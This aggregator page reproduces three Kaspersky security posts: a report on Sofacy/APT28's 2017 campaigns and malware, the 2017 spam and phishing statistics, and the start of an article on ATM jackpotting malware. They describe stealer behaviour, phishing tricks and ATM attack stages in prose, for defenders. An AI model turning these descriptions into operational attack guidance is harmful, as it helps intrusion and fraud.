Kaspersky Securelist

Syndikovat obsah Securelist - Information about Viruses, Hackers and Spam
Online headquarters of Kaspersky Lab security experts.
Aktualizace: 2 hodiny 15 min zpět

A Slice of 2017 Sofacy Activity

20 Únor, 2018 - 15:00

Sofacy, also known as APT28, Fancy Bear, and Tsar Team, is a highly active and prolific APT. From their high volume 0day deployment to their innovative and broad malware set, Sofacy is one of the top groups that we monitor, report, and protect against. 2017 was not any different in this regard. Our private reports subscription customers receive a steady stream of YARA, IOC, and reports on Sofacy, our most reported APT for the year.

This high level of cyber-espionage activity goes back years. In 2011-2012, the group used a relatively tiny implant (known as “Sofacy” or SOURFACE) as their first stage malware, which at the time had similarities with the old Miniduke implants. This made us believe the two groups were connected, although it looks they split ways at a certain point, with the original Miniduke group switching to the CosmicDuke implant in 2014. The division in malware was consistent and definitive at that point.

In 2013, the Sofacy group expanded their arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across 4-5 generations) and a few others. We’ve seen quite a few versions of these implants, which were relatively widespread at some point or still are. In 2015 we noticed another wave of attacks which took advantage of a new release of the AZZY implant, largely undetected by antivirus products. The new wave of attacks included a new generation of USB stealers deployed by Sofacy, with initial versions dating to February 2015. It appeared to be geared exclusively towards high profile targets.

Sofacy’s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group’s activities in 2016, especially when data from the compromise was leaked and “weaponized”. And later 2016, their focus turned towards the Olympics’ and the World Anti-Doping Agency (WADA) and Court of Arbitration for Sports (CAS), when individuals and servers in these organizations were phished and compromised. In a similar vein with past CyberBerkut activity, attackers hid behind anonymous activist groups like “anonpoland”, and data from victimized organizations were similarly leaked and “weaponized”.

This write-up will survey notables in the past year of 2017 Sofacy activity, including their targeting, technology, and notes on their infrastructure. No one research group has 100% global visibility, and our collected data is presented accordingly. Here, external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer’s Choice spearphishing are of interest. From where we sit, 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners, coinciding with lighter interest in Central Asian targets, and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East.

Dealer’s Choice

The beginning of 2017 began with a slow cleanup following the Dealer’s Choice campaign, with technical characteristics documented by our colleagues at Palo Alto in several stages at the end of 2016. The group spearphished targets in several waves with Flash exploits leading to their carberp based JHUHUGIT downloaders and further stages of malware. It seems that many folks did not log in and pull down their emails until Jan 2017 to retrieve the Dealer’s Choice spearphish. Throughout these waves, we observed that the targets provided connection, even tangential, to Ukraine and NATO military and diplomatic interests.

In multiple cases, Sofacy spoofs the identity of a target, and emails a spearphish to other targets of interest. Often these are military or military-technology and manufacturing related, and here, the DealersChoice spearphish is again NATO related:

The global reach that coincided with this focus on NATO and the Ukraine couldn’t be overstated. Our KSN data showed spearphishing targets geolocated across the globe into 2017.

DealersChoice emails, like the one above, that we were able to recover from third party sources provided additional targeting insight, and confirmed some of the targeting within our KSN data:

0day Deployment(s)

Sofacy kicked off the year deploying two 0day in a spearphish document, both a Microsoft Office encapsulated postscript type confusion exploit (abusing CVE-2017-0262) and an escalation of privilege use-after-free exploit (abusing CVE-2017-0263). The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017. They took advantage of the Syrian military conflict for thematic content and file naming “Trump’s_Attack_on_Syria_English.docx”. Again, this deployment was likely a part of their focus on NATO targets.

Light SPLM deployment in Central Asia and Consistent Infrastructure

Meanwhile in early-to-mid 2017, SPLM/CHOPSTICK/XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia. These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer, keylogger, and remoteshell functionality to a system of interest. As the latest revision of the backdoor, portions of SPLM didn’t match previous reports on SPLM/XAgent while other similarities were maintained. SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year. Targeting profiles included defense related commercial and military organizations, and telecommunications.

Targeting included TR, KZ, AM, KG, JO, UK, UZ

Heavy Zebrocy deployments

Since mid-November 2015, the threat actor referred to as “Sofacy” or “APT28” has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIT. We collectively refer to this package and related activity as “Zebrocy” and had written a few reports on its usage and development by June 2017 – Sofacy developers modified and redeployed incremented versions of the malware. The Zebrocy chain follows a pattern: spearphish attachment -> compiled Autoit script (downloader) -> Zebrocy payload. In some deployments, we observed Sofacy actively developing and deploying a new package to a much smaller, specific subset of targets within the broader set.

Targeting profiles, spearphish filenames, and lures carry thematic content related to visa applications and scanned images, border control administration, and various administrative notes. Targeting appears to be widely spread across the Middle East, Europe, and Asia:</p style=”margin-bottom:0!important”>

  • Business accounting practices and standards
  • Science and engineering centers
  • Industrial and hydrochemical engineering and standards/certification
  • Ministry of foreign affairs
  • Embassies and consulates
  • National security and intelligence agencies
  • Press services
  • Translation services
  • NGO – family and social service
  • Ministry of energy and industry

We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. The components were an unexpected inclusion in this particular toolset. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files 60mb and less with these extensions:</p style=”margin-bottom:0!important”>

  • .doc
  • .docx
  • .xls
  • .xlsx
  • .ppt
  • .pptx
  • .exe
  • .zip
  • .rar

At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its “RecordToFile” file stealer method.

Zebrocy spearphishing targets:

SPLM deployment in Central Asia

SPLM/CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications, mostly deployed in the second half of 2017 by Sofacy. Earlier SPLM activity deployed 32-bit modules over unencrypted http (and sometimes smtp) sessions. In 2016 we saw fully functional, very large SPLM/X-Agent modules supporting OS X.

The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels, maintaining slightly morphed encryption and functionality per deployment. Sofacy selectively used SPLM/CHOPSTICK modules as second stage implants to high interest targets for years now. In a change from previous compilations, the module was structured and used to inject remote shell, keylogger, and filesystem add-ons into processes running on victim systems and maintaining functionality that was originally present within the main module.

The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form. These targets include foreign affairs government organizations both localized and abroad, and defense organizations’ presence localized, located in Europe and also located in Afghanistan. One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina.

Minor changes and updates to the code were released with these deployments, including a new mutex format and the exclusive use of encrypted HTTP communications over TLS. The compiled code itself already is altered per deployment in multiple subtle ways, in order to stymie identification and automated analysis and accommodate targeted environments. Strings (c2 domains and functionality, error messages, etc) are custom encrypted per deployment.

Targets: TR, KZ, BA, TM, AF, DE, LT, NL

SPLM/CHOPSTICK/XAgent Modularity and Infrastructure

This subset of SPLM/CHOPSTICK activity leads into several small surprises that take us into 2018, to be discussed in further detail at SAS 2018. The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality, but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues. Changes in the second stage SPLM backdoor are refined, making the code reliably modular.

Infrastructure Notes

Sofacy set up and maintained multiple servers and c2 for varying durations, registering fairly recognizable domains with privacy services, registrars that accept bitcoin, fake phone numbers, phony individual names, and 1 to 1 email address to domain registration relationships. Some of this activity and patterns were publicly disclosed, so we expect to see more change in their process in 2018. Also, throughout the year and in previous years, researchers began to comment publicly on Sofacy’s fairly consistent infrastructure setup.

As always, attackers make mistakes and give away hints about what providers and registrars they prefer. It’s interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS. As an example, we might see extraneous data in their SSL/TLS certificates that give away information about their provider or resources. Leading up to summer 2017, infrastructure mostly was created with PDR and Internet Domain Service BS Corp, and their resellers. Hosting mostly was provided at Fast Serv Inc and resellers, in all likelihood related to bitcoin payment processing.

Accordingly, the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing. One certificate was generated locally on what appeared to be a HP-UX box, and another was generated on “8569985.securefastserver[.]com” with an email address “root@8569985.securefastserver[.]com”, as seen here for their nethostnet[.]com domain. This certificate configuration is ignored by the malware.

In addition to other ip data, this data point suggested that Qhoster at https://www.qhoster[.]com was a VPS hosting reseller of choice at the time. It should be noted that the reseller accepted Alfa Click, PayPal, Payza, Neteller, Skrill, WebMoney, Perfect Money, Bitcoin, Litecoin, SolidTrust Pay, CashU, Ukash, OKPAY, EgoPay, paysafecard, Alipay, MG, Western Union, SOFORT Banking, QIWI, Bank transfer for payment.


Sofacy, one of the most active APT we monitor, continues to spearphish their way into targets, reportedly widely phishes for credentials, and infrequently participates in server side activity (including host compromise with BeEF deployment, for example). KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia, and finally moving their focus further east into late 2017. Their operational security is good. Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH, Zebrocy, and SPLM, to name a few. Their evolving and modified SPLM/CHOPSTICK/XAgent code is a long-standing part of Sofacy activity, however much of it is changing. We’ll cover more recent 2018 change in their targeting and the malware itself at SAS 2018.

With a group like Sofacy, once their attention is detected on a network, it is important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two factor authentication for services like email and vpn access. In order to identify their presence, not only can you gain valuable insight into their targeting from intelligence reports and gain powerful means of detections with hunting tools like YARA, but out-of-band processing with a solution like KATA is important.

Technical Appendix Related md5


Related domains


Spam and phishing in 2017

15 Únor, 2018 - 11:00

Figures of the year
  • The share of spam in mail traffic came to 56.63%, down 1.68% against 2016.
  • The biggest source of spam remains the US (13.21%).
  • 40% of spam emails were less than 2 KB in size.
  • The most common malware family found in mail traffic was Trojan-Downloader.JS.Sload
  • The Anti-Phishing system was triggered 246,231,645 times.
  • 9% of unique users encountered phishing
Global events in spam

Spam emails that mention the hottest topics in the world news agenda are a permanent feature of junk traffic. This trend has been observed for several years and is unlikely to change any time soon. Natural disasters in 2017 (hurricanes Irma and Harvey, the earthquake in Mexico) were a gift to fraudsters. “Nigerian” scammers bombarded mailboxes with messages asking for assistance in obtaining the inheritance of deceased relatives and donations for disaster victims, etc. Natural disasters were also a common theme in advertising spam and emails offering jobs and loans.

In 2017 spammers made frequent mention of natural disasters

Sporting events are another favorite topic of spammers. The most popular — and most mentioned in fake giveaway messages — are major soccer competitions and the Olympics. Back in 2016 we picked up emails citing the FIFA 2018 World Cup, and the following year their number increased, with the format and content unchanged. Typically, such emails say that during such-and-such lottery, supposedly held by a well-known organization, the recipient was randomly selected among a million others as the winner of a huge cash prize. Besides money, scammers sometimes promise tickets to competitions. The details are usually outlined in file attachments using official competition and sponsor logos.

“Winning” the lottery can be timed to major sporting events

The “Nigerian” scammers often refer to famous figures. Presidents and other political VIPs are especially in demand. In 2017, one of the most popular figures for fraudsters was US President Donald Trump.

We predict that in 2018 scammers will continue to pay close attention to world events and famous figures so as not to let slip the chance to squeeze ever more money and personal info out of gullible victims.

Cryptocurrencies in spam

Throughout the year we wrote that cryptocurrencies had gained a foothold in advertising spam and fraudulent mailings: all the numerous “Earn from home” schemes, financial pyramids, fake lottery wins, and phishing scams, etc., seem to have been updated and given a cryptocurrency makeover. Let’s try to systematize the various types of cryptocurrency-related spam.


As major conferences and seminars are held on blockchain technology, spammers are making increasing use of this topic for their own purposes. The seminars advertised in their mailings don’t overload users with technical details, but promise to teach them how to extract eye-watering profits from cryptocurrencies. Such mailings are relatives of “traditional” spam on the topic “How to make a killing on the stock exchange.”

Example emails advertising “lucrative” seminars

Financial fraud

A specific type of cryptocurrency fraud relates to fake “cloud mining” services. Such services hire out the mining power of their own specialized data centers. Fake sites offer similar services, but on paying up, the user receives neither mining power nor their money back. The crypto version of the classic pyramid scam warrants a special mention: the user “receives” mining income until they enlist other victims (for which there is also a reward). But sooner or later the cash flow stops, and the original investment is not repaid.

Fake “cloud mining” services offer enticing rewards

Sites masquerading as cryptocurrency trading platforms operate in a similar manner. The crucial difference between them and real exchanges is that money can only be invested, not withdrawn. Revenue usually “grows” very quickly, stimulating the user to invest more funds.

On fake cryptocurrency exchanges, experience really isn’t necessary

More subtle are binary options brokers (and their fake counterparts). We covered them in a previous report.

Another type of cryptocurrency fraud is fake services offering to exchange one currency for another, or convert it into “real” money. Scammers lure victims with favorable exchange rates, and then make off with the cash.

The “currency exchange desk” simply pockets the money for itself

Spam is very often used for this kind of fraud because it gives what all scammers crave — anonymity.

Other types of fraud

More traditional types of fraud, such as fake lottery wins, started using bitcoin bait:


CryptoLocker, whose creators demanded payment in bitcoin, was found in spam far less often than in 2016. That said, we encountered various modifications of Locky, Cerber, Rack, and other ransomware. At the same time, new capabilities such as stealing passwords from cryptocurrency wallets and mining were added to spam-distributed malware.

What’s more, a host of malware was distributed in spam under the guise of bitcoin mining tools or trading instructions.

The attached document was detected as HEUR:Exploit.RTF.Generic

Address databases

Targeted address databases advertised through spam were updated with the email addresses of cryptocurrency users, putting the address owners at risk of a targeted attack (for example, phishing as mentioned above).

Like other hot global issues, cryptocurrency is set be a recurring theme in spam for a very long time to come. And given the juicy rewards on offer, 2018 can expect to see growth in both fraudulent and phishing “cryptocurrency” spam.

Spamming by ethnicity

As we all know, spam peddles everything from potency-enhancing drugs to fake goods by well-known brands — it’s an international phenomenon that knows no geographic boundaries. However, 2017 caught the eye for some more localized spam content.

China and manufacturing

Back in 2016, we wrote about the Chinese habit of using spam to market goods internationally. Nothing changed in 2017: More and more Chinese companies are offering their products in this way.

India and IT

Whereas the Chinese are keen to sell goods on the international market, spam from India is more likely to offer IT services: SEO, web design, mobile apps, and much more:

Russia and seminars

Russian spam is written in, yes, Russian — and is therefore aimed at the domestic market. It too advertises goods and services, but more striking is the range of seminars and training on offer:

America and targeted business spam

In the US, the law governing the distribution of advertising messages operates on the opt-out principle. Accordingly, users can be sent messages until they explicitly unsubscribe from the mailing list in question, for which a link must be provided. The CAN-SPAM Act stipulates many other legal requirements for mailings. The legislation demands that the message body match the subject in terms of topic, there be no automatic collection of addresses, the advertiser’s physical address appear in the text, and much more.

Using the opt-out principle, many small, and sometimes not-so-small, companies send out promotional materials to people who have not subscribed to them. A legal gray area arises from the fact that even if spam-mailing companies are physically located in the US, the emails are distributed worldwide, and most countries operate an opt-in policy, requiring the prior consent of recipients. In other words, some countries at the legislative level consider mailshots to be spam.

A trait of business spam is its very narrow targeting of companies operating in specific areas. Oftentimes, mailings are not directed to the company as a whole, but to people with certain job titles.

Malware and the corporate sector

The number of malicious spam messages in 2017 fell 1.6-fold against 2016. Kaspersky Lab clients registered a total of 145,820,119 triggers of Mail Anti-Virus throughout 2017.

Number of Mail Anti-Virus triggers among Kaspersky Lab clients in 2017

This drop is due to the unstable operation of the Necurs botnet: it mediated the spread of far fewer mailings, and in Q1 2017 was completely idle. Malicious mailshots sent via Necurs were short, not personalized. They were used to try to install cryptolockers from the Locky family on recipients’ computers.

In general, 2017 was marked by a large cluster of malicious, but well-crafted emails, containing fragments of business correspondence matching the company profile, plus the full details of the organizations in whose name they had been sent.

Emails containing malicious objects detected as Backdoor.Java.Adwind.cu

The messages were not mass-distributed, but most likely targeted. Based on the target domain names, it can be assumed that the attackers were primarily interested in the corporate sector, while the tactic of citing previous messages of the addressee suggests in some cases a Business Email Compromise-type attack.

An email containing a malicious object detected as Trojan-PSW.Win32.Fareit.dnak

Malware downloaded onto the victim computer most often had functions for collecting detailed information about the system and its settings (as well as passwords, keystrokes, etc.), and then transferring this data to a remote server. For information about potential targets and perpetrators of such attacks, see our article.

Phishing Phishing pages migrate to HTTPS

Sites have been moving to HTTPS in increasing numbers, and not just legitimate resources. If a year ago a top tip for users was “check that pages requesting personal data are secure,” today a certificate does not guarantee safety: anyone or anything could be behind it.

Where do scammers get certificates? For domains created specifically for fraudulent purposes, attackers most likely use free 90-day certificates from Let’s Encrypt and Comodo, two certificate authorities. Getting hold of one is simplicity itself.

A phishing site with a free 90-day certificate issued by Let’s Encrypt

What’s more, phishing pages are often located on hacked sites that already have the necessary certificates.

A phishing page located on a hacked site with HTTPS

Scammers also make use of free web hosting with an SSL certificate:

On the topic of free hosting sites, it should be noted that attackers often use services that do not closely monitor user-posted content. It is not uncommon for phishing content to be placed on free hosting sites of well-known companies: this reduces the risk of the page being blacklisted, since it is located on a reputable domain with a high-profile name and a good SSL certificate. And although such services are pro-active in the fight against illegitimate content, phishing pages on their domains are found fairly often.

A phishing page located on the Google Sites service redirecting users to a third-party resource where payment system data is requested

Phishing pages located on the Force.com Sites service

Punycode encoding

Another important rule is to always check the spelling of the domain name, a task made more difficult due to the active use by phishers of Punycode encoding, which helps mask phishing domain names under the domains of well-known brands. Web browsers use Punycode to display Unicode characters in the address bar, but if all the characters in the domain name belong to the character set for one language, the browser displays them not in Punycode format, but in the specified language. Scammers select characters similar or identical to ones in Latin script, and use them to create domain names that resemble those of well-known companies.

The technique is not new, but caused a real stir this year, especially after an article by Chinese researcher Xudong Zheng. As an example, he created a domain with a name that in the address bar was indistinguishable from Apple’s domain. Phishers aren’t always able to find identical symbols, but the results are still look pretty convincing.

Examples of domains displayed in Punycode in browser address bars

Besides the external similarity to the original domain, such domains are more difficult to detect by keywords.

Fake cryptocurrency wallets

Fraudsters are always up to speed on the latest trends, brands, and news hooks. The hype around cryptocurrencies in 2017 reached such a crescendo that even those far removed from the virtual world were snapping up bitcoin, whatever it was.

As a result, cryptocurrency wallets were a very attractive target for phishers. Proof of this is the large number of phishing pages spoofing cryptocurrency wallets. We encountered Coinbase, BitGo, and Xapo, to name just a few. One of the leaders by number of spoofs is blockchain.info.

Examples of phishing pages mimicking user sign-in to popular cryptocurrency wallets

Scammers also spoof popular cryptocurrency services in an attempt to get users to hand over money under the guise of lucrative investments.

A page spoofing the popular Coinbase

Social media fraud

In Q2, social networks were hit by a wave of air ticket giveaways. Scammers set up websites under famous airline brands that were supposedly raffling off tickets. After completing a short survey, the user was redirected to a resource created by the attackers. This could be an infected site, a phishing page prompting to install malware under the guise of a browser update, or a page spreading malicious content, etc.

Examples of Facebook posts with links to various scamming domains

The scheme is not new, but the distribution mechanism in this case is innovative: in winning a “prize,” users themselves shared unsafe content in social media.

For some domains in the scheme, visitor activity statistics were available, according to which just one of the sites was visited by more than 2,500 users worldwide in the space of an hour:

In Q3, scammers shifted their attention to WhatsApp and extended their assortment of fake prizes.

Fake giveaways that began their odyssey in social media migrated to WhatsApp, and the range of prizes expanded

Fake viruses

Cybercriminals often don’t even bother to write malware, using instead fake virus notifications supposedly from common operating systems. Such messages often appear as pop-up ads or as the result of the user being passed through a redirect chain. This might happen after completing a survey, as in the scheme described above.

The scammers’ primary aim is to intimidate and coerce users into calling a “technical support” number where they are offered solutions to disinfect their computer — not free of charge, of course.

Examples of pages showing fake system infection messages

It’s not only Windows users in the firing line. Scammers are targeting Apple products, too.

Example of a page showing a fake system infection message

Under the same guise, cybercrooks also distribute insecure software.

Example of a page showing a fake system infection message and prompting to download a file

Tax refunds

Another eternal topic is tax returns and tax refunds. Public trust in government sites plays an important role in the success of phishing operations in this segment. Exploiting features of the taxation system in different countries, scammers carry out successful attacks in the US, France, Canada, Ireland, and elsewhere.

Examples of phishing pages using the names of tax authorities in different countries

The new iPhone

The release of the new version of the popular smartphone also attracted scammers, with attempts to redirect users to phishing pages mimicking Apple sites growing 1.5-fold in September, when the latest iteration of the flagship series went on sale.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the Apple brand, 2017

The launch of Apple’s new smartphone inspired a host of fraudulent schemes, including fake giveaways, sales of counterfeit devices, and classic phishing scams mentioning the brand.

Fake Apple sign-in page

Statistics: spam Proportion of spam in email traffic

The share of spam in email traffic in 2017 fell by 1.68% to 56.63%.

Proportion of spam in global email traffic, 2017

The lowest share (52.67%) was recorded in December 2017. The highest (59.56%) belonged to September.

Sources of spam by country

In 2017, the US remained the biggest source of spam (13.21%). A 6.59% hike in spam distribution pushed China up to second place (11.25%). Vietnam took bronze (9.85%).

India slipped from third to fourth (7.02%), showing a 3.13% decline in its share of spam. Next came Germany (5.66%, +2.45%) and Russia (5.40%, +1.87%).

In the seventh place was Brazil (3.97%, -0.04%). And in ninth, France (3.71%, -0.32%). Italy rounds off the Top 10 with a score of 1.86%, up 0.62% against 2016.

Source of spam by country, 2017

Spam email size

In 2017, the share of very small emails (up to 2 KB) in spam again dropped sharply, averaging 43.40%, which is 18.76% less than in 2016. The proportion of emails ranging in size from 2 to 5 KB amounted to 5.08%, another significant change.

Spam emails by size, 2017

There was further growth in the share of emails between 5 and 10 KB (9.14%, +2.99%), 10 and 20 KB (16.26%, +1.79%), and 20 and 50 KB (21.23%, +11.15%). Overall, spam in 2017 did not buck the trend of fewer very small emails and rising numbers of average size emails (5-50 KB).

Malicious attachments in email Malware families

Top 10 malware families in 2017

In 2017, the most common malware family in email traffic was Trojan-Downloader.JS.Sload — a set of JS scripts that download and run other malicious programs on the victim computer, usually encryptors.

Runner-up was last year’s leader Trojan-Downloader.JS.Agent — the typical member of this malware family is an obfuscated JS that uses ADODB.Stream technology to download and run DLL, EXE, and PDF files.

Third place went to the Backdoor.Java.Qrat family — a cross-platform multi-functional backdoor written in Java and sold in the Darknet under the umbrella of Malware-as-a-Service (MaaS). It is generally distributed by email in the form of JAR attachments.

The Worm.Win32.WBVB family took fourth place. It includes executable files written in Visual Basic 6 (both in P-Code mode and Native mode) that are untrusted in KSN.

Trojan-PSW.Win32.Fareit completes the Top 5. This malware family is designed to steal data, such as the credentials of FTP clients installed on infected computers, cloud-storage credentials, browser cookies, and email passwords. Fareit Trojans send the information collected to the attackers’ server. Some members of the family can download and run other malware.

In sixth position was the Trojan-Downloader.MSWord.Agent family. This malware takes the form of a DOC file with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads another malicious file from the attackers’ site and runs it on the user’s computer.

In seventh is Trojan.PDF.Badur, which poses as a PDF document containing a link to a potentially dangerous site.

Eighth place was occupied by the Trojan-Downloader.VBS.Agent family — a set of VBS scripts that use ADODB.Stream technology to download ZIP archives and run malware extracted from them.

Trojan.WinLNK.Agent found itself in ninth position. Members of this malware family have the extension .lnk and contain links for downloading malicious files or a path for running another malicious executable file.

One more family of Trojan loaders, Trojan.Win32.VBKrypt, props up the Top 10.

Countries targeted by malicious mailshots

In 2017, Germany (16.25%, +2.12%) held on to top spot. China (12.10%) climbed from third to second, adding 4.78% for the year. Russia (6.87%, +1.27%) rounds off the Top 3.

Countries targeted by malicious mailshots, 2017

Further down come Japan (5.32%, -2.27%), Britain (5.04%, -0.13%), Italy (4.89%, -0.55%), and Brazil (4.22%, -0.77%).

Eighth place is taken by Vietnam (2.71%, +0.81%). And ninth by France (2.42%, -1.15%). The Top 10 is rounded off by the UAE (2.34%, +0.82%).

Statistics: phishing

In 2017, the Anti-Phishing system was triggered 246,231,645 times on computers of Kaspersky Lab users as a result of phishing redirection attempts. That is 91,273,748 more than in 2016. In all, 15.9% of our users were targeted by phishers.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an email or on the Internet to a phishing page in the event that such links have yet to be added to Kaspersky Lab’s databases.

Organizations under attack by category

The lion’s share of heuristic component triggers in 2017 went to pages that mentioned banking organizations (27%, +1.24%). Second place in the rating is the Payment systems category (15.87%, +4.32%), followed by Online stores (10.95%, +0.78%).

Distribution of organizations subject to phishing attacks by category, 2017.

See our financial report (link) for more details about phishing in the financial sector.

Top 3 organizations under attack from phishers

As before, the trend in mass phishing is still to use the most popular brands. By doing so, scammers significantly increase the likelihood of a successful attack. The Top 3 is made of organizations whose names were most often used by phishers (according to the heuristic statistics for triggers on user computers):

Facebook 7.97% Microsoft Corporation 5.57% PayPal 4.50% The geography of attacks Countries by percentage of attacked users

As in the previous year, Brazil had the highest percentage of attacked unique users out of the total number of users in the country, seeing its score increase by 1.41% to 29.02%.

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2017

Top 10 countries by percentage of attacked users

Brazil 29.02% Australia 22.51% China 19.23% Qatar 18.45% Bolivia 18.38% Albania 17.95% New Zealand 17.85% Portugal 16.76% Angola 16.45% Russia 16.43%

Top 10 countries by percentage of attacked users

The number of attacked users also increased in Australia — by 2.43% to 22.5%. Next come China (19.23%), where the share of attacked users fell by 3.61%, and Qatar (14.45%).


The number of malicious spam messages in 2017 fell 1.6-fold against 2016. This drop is due to the unstable operation of the Necurs botnet, which mediated the spread of far fewer mailings.

In 2018, spammers and phishers will continue to closely monitor world events and famous figures so as not to miss any opportunity to extract money and personal info from their unsuspecting targets. We can expect mailings to refer to the Winter Olympic Games, the FIFA World Cup, the presidential elections in Russia, and other events. What’s more, the first few months of the year are likely to experience a wave of phishing pages and mailshots exploiting the topic of tax refunds, since in many countries April is tax payment month. The theme of cryptocurrency will be popping up in spam for a very long time to come. And given the juicy rewards on offer, 2018 can expect to see growth in both fraudulent and phishing “cryptocurrency” spam.

The number of phishing sites using SSL certificates will surely continue to grow. As will the use of different domain name obfuscation methods.

Bingo, Amigo! Jackpotting: ATM malware from Latin America to the World

14 Únor, 2018 - 11:00


Of all the forms of attack against financial institutions around the world, the one that brings traditional crime and cybercrime together the most is the malicious ecosystem that exists around ATM malware. Criminals from different backgrounds work together with a single goal in mind: jackpotting. If there is one region in the world where these attacks have achieved highly professional levels it’s Latin America.

From “Ploutus”, “Greendispenser”, “Prilex”, traditional criminals and Latin American cybercriminals have been working closely and effectively to steal large sums of money directly from ATMs with quite an elevated rate of success. In order to do it, they have developed a number of tools and techniques that are unique to this region, eventually importing malware from Eastern European cybercriminals and then improving the code to create their own domestic solutions, which they later deploy on a larger scale.

The combination of factors such as the use of obsolete and unsupported operating systems and the availability of easy to use development platforms have allowed the creation of malicious code with technologies such as the .NET framework, without the need for too high technical skills.

We are facing a rising wave of threats against ATMs that have been technically and operationally improved, becoming an immense challenge for financial institutions and security professionals alike. Currently, the attacks on such devices have already generated considerable losses for financial institutions, begging the question: What and when will the next big hit be? “Motivation” is the key word. Why focus on stealing information to monetize it later when it is easier to steal funds directly from the bank?

In this article, we will show an overview on operational details about how these regional attacks against financial institutions have created a unique situation in Latin America. We’ll also highlight how banks and security companies are falling victims to them and how attacks are spreading in the region, aiming to surpass jackpot attacks coming from mariachis and chupacabras.

Dynamite, fake fronts, ATM (in)security

The easiest way to steal money from an ATM machine used to be to blow it up. Most Latin American cybercriminals used to do it on a regular basis. In fact, this type of attack still happens in several parts of the region. Security cameras, CCTV and any other physical security measures proved ineffective in deterring this rudimentary yet extremely effective attack. In many cases, the explosive devices used by the thieves caused damage, not only to the ATMs, but also to bank branches, public squares and the shopping malls in which they were located. A small number of incidents have even caused damage to buildings close to banks.

Explosive attacks on ATMs are a rising problem in Europe as well. In a report covering the first six months of 2016, EAST (European Association for Secure Transactions) reported a total of 492 explosive attacks in Europe; a rise of 80 percent compared to the same period in 2015. Such attacks do not just present a financial risk due to stolen cash, but are also the cause of significant collateral damage to equipment and buildings. Of most concern is the fact that lives can also be placed in danger, particularly by the use of solid explosives.

Actually, it is effortless to find videos on YouTube showing the explosions of ATM machines, mainly in Brazil.

Old school way of robbing an ATM: blowing it up. Some examples here and here.

In an attempt to stop these attacks, Brazilian banks have adopted ink cartridges to stain the bills when the ATM is blown up. Criminals responded quickly, finding a way to remove the ink from the bills using a special solvent. It’s the eternal cat-and-mouse (or should we say a mouse and cat) game among fraudsters and financial institutions.

Another bold maneuver used commonly by criminals in Latin America is to cover the front of an ATM with a whole fake piece that looks like the original. Such an approach seems to surprise visitors when traveling to our region. This technique was presented to the media by Brian Krebs as the “biggest skimmer of all“. Actually, criminals are able to install it without any complications in a day light in supermarkets and other retail businesses (see video).

ATM fake fascia: what you see is not what you get.

For criminals, it’s not difficult to build a fake replica of an ATM machine, especially since they can buy the parts needed on the black-market and even on-line stores easily. Here’s an example of an ATM keyboard sold at a regional on-line store (the Latin American eBay). This device helps cybercriminals build whatever they want. Sometimes, criminals find and recruit insiders right from the ATM industry.

You can build your own fake home assemblied ATM, buying it in pieces…

Another worldwide problem affecting ATMs in Latin America is the reliance on obsolete software with several unpatched vulnerabilities, that’s installed and in-use every day in production environments. Most ATMs are still running on Windows XP or Windows 2000, systems that have already reached their end-of-life, and Microsoft has officially ceased to support for them. In addition to the obsolete software, one may frequently find ATMs with completely exposed cables and network devices that are easy to access and manipulate. Such situations are due to insufficient physical security policies, opening a variety of possibilities to the region’s criminals.

Cables and routers exposed in ATMs running Windows XP: a gold mine for scammers.

However, such attacks represent a risk for those criminal daredevils as they can be recorded by surveillance cameras while trying to tamper with the machines, inserting a dynamite stick, or installing a fake ATM cover right in front of big brother’s eyes. As banks have enhanced the physical security of ATMs, it is no longer so profitable for criminals to rely on the physical assaults of these, thus giving way to the gradual rise of ATM malware in the region.

The process of stealing money from ATMs using malware typically consists of four stages:

  • The attacker gains local/remote access to the machine.
  • Malicious code is installed in the ATM system.
  • In some cases, to complete the infection process, a reboot of the ATM is needed. Sometimes cybercriminals use umbrella or blackbox schemes to reboot and for their operations support.
  • The final stage (and the ultimate goal of the entire process) is withdrawing the money – jackpotting!

Getting access to the inside of an ATM is not a particularly difficult task. The process of infecting is also fairly clear – arbitrary code can be executed on an obsolete (or insufficiently secured) system. There seems to be no problem with withdrawing money either – the malware interface is usually opened by using a specific key combination on the PIN pad or by inserting a “special card”. Sometimes all that is needed is a remote command sent from an already compromised machine in the bank’s network, leaving the “mule” ready for the final step of the game and cashing out without raising any eyebrows.

From Eastern Europe to Latin America

